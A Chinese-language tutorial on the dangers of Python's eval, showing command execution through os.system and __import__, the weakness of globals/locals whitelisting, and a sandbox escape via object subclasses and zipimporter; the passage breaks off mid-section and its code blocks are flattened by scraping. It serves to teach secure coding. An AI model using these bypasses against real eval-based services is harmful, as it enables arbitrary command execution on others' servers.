Python 中 eval 带来的潜在风险
0x00 前言
eval是Python用于执行python表达式的一个内置函数,使用eval,可以很方便的将字符串动态执行。比如下列代码:
| 12345 | #!python>>> eval(\”1+2\”)3>>> eval(\”[x for x in range(10)]\”)[0, 1, 2, 3, 4, 5, 6, 7, 8, 9] |
当内存中的内置模块含有os的话,eval同样可以做到命令执行:
| 12345 | #!python>>> import os>>> eval(\”os.system(\’whoami\’)\”)win–20140812chjadministrator0 |
当然,eval只能执行Python的表达式类型的代码,不能直接用它进行import操作,但exec可以。如果非要使用eval进行import,则使用__import__:
| 123456789101112 | #!python>>> exec(\’import os\’)>>> eval(\’import os\’)Traceback (most recent call last): File \”\”, line 1, in File \”\”, line 1 import os ^SyntaxError: invalid syntax>>> eval(\”__import__(\’os\’).system(\’whoami\’)\”)win–20140812chjadministrator0 |
在实际的代码中,往往有使用客户端数据带入eval中执行的需求。比如动态模块的引入,举个栗子,一个在线爬虫平台上爬虫可能有多个并且位于不同的模块中,服务器端但往往只需要调用用户在客户端选择的爬虫类型,并通过后端的exec或者eval进行动态调用,后端编码实现非常方便。但如果对用户的请求处理不恰当,就会造成严重的安全漏洞。
0x01 “安全”使用eval
现在提倡最多的就是使用eval的后两个参数来设置函数的白名单:
Eval函数的声明为eval(expression[, globals[, locals]])
其中,第二三个参数分别指定能够在eval中使用的函数等,如果不指定,默认为globals()和locals()函数中 包含的模块和函数。
| 123456789101112 | #!python>>> import os>>> \’os\’ in globals()True>>> eval(\’os.system(\’whoami\’)\’)win–20140812chjadministrator0>>> eval(\’os.system(\’whoami\’)\’,{},{})Traceback (most recent call last): File \”\”, line 1, in File \”\”, line 1, in NameError: name \’os\’ is not defined |
如果指定只允许调用abs函数,可以使用下面的写法:
| 1234567891011 | #!python>>> eval(\’abs(-20)\’,{\’abs\’:abs},{\’abs\’:abs})20>>> eval(\’os.system(\’whoami\’)\’,{\’abs\’:abs},{\’abs\’:abs})Traceback (most recent call last): File \”\”, line 1, in File \”\”, line 1, in NameError: name \’os\’ is not defined>>> eval(\’os.system(\’whoami\’)\’)win–20140812chjadministrator0 |
使用这种方法来防护,确实可以起到一定的作用,但是,这种处理方法可能会被绕过,从而造成其他问题!
0x02 绕过执行代码1
被绕过的情景如下,小明知道了eval会带来一定的安全风险,所以使用如下的手段去防止eval执行任意代码:
| 123456789 | #!pythonenv = {}env[\”locals\”] = Noneenv[\”globals\”] = Noneenv[\”__name__\”] = Noneenv[\”__file__\”] = Noneenv[\”__builtins__\”] = None eval(users_str, env) |
Python中的__builtins__是内置模块,用来设置内置函数的模块。比如熟悉的abs,open等内置函数,都是在该模块中以字典的方式存储的,下面两种写法是等价的:
| 12345 | #!python>>> __builtins__.abs(–20)20>>> abs(–20)20 |
我们也可以自定义内置函数,并像使用Python中的内置函数一样使用它们:
| 123456 | #!python>>> def hello():... print \’shabi\’>>> __builtin__.__dict__[\’say_hello\’] = hello>>> say_hello()shabi |
小明将eval函数的作用域中的内置模块设置为None,好像看起来很彻底了,但依然可以被绕过。__builtins__是__builtin__的一个引用,在__main__模块下,两者是等价的:
| 12345 | #!python>>> id(__builtins__)3549136>>> id(__builtin__)3549136 |
根据乌云drops提到的方法,使用如下代码即可:
| 12 | #!python[x for x in ().__class__.__bases__[0].__subclasses__() if x.__name__ == \”zipimporter\”][0](\”/home/liaoxinxi/eval_test/configobj-4.4.0-py2.5.egg\”).load_module(\”configobj\”).os.system(\”uname\”) |
上面的代码首先利用__class__和__subclasses__动态加载了object对象,这是因为eval中无法直接使用object。然后使用object的子类的zipimporter对egg压缩文件中的configobj模块进行导入,并调用其内置模块中的os模块从而实现命令执行,当然,前提是要有configobj的egg文件。 configobj模块很有意思,居然内置了os模块:
| 123456789101112 | #!python>>> \”os\” in configobj.__dict__True>>> import urllib>>> \”os\” in urllib.__dict__True>>> import urllib2>>> \”os\” in urllib2.__dict__True>>> configobj.os.system(\”whoami\”)win–20140812chjadministrator0 |
和configobj类似的模块如urllib,urllib2,setuptools等都有os的内置,理论上使用哪个都行。 如果无法下载egg压缩文件,可以下载带有setup.py的文件夹,加入:
| 12 | #!pythonfrom setuptools import setup, find_packages |
然后执行:
| 12 |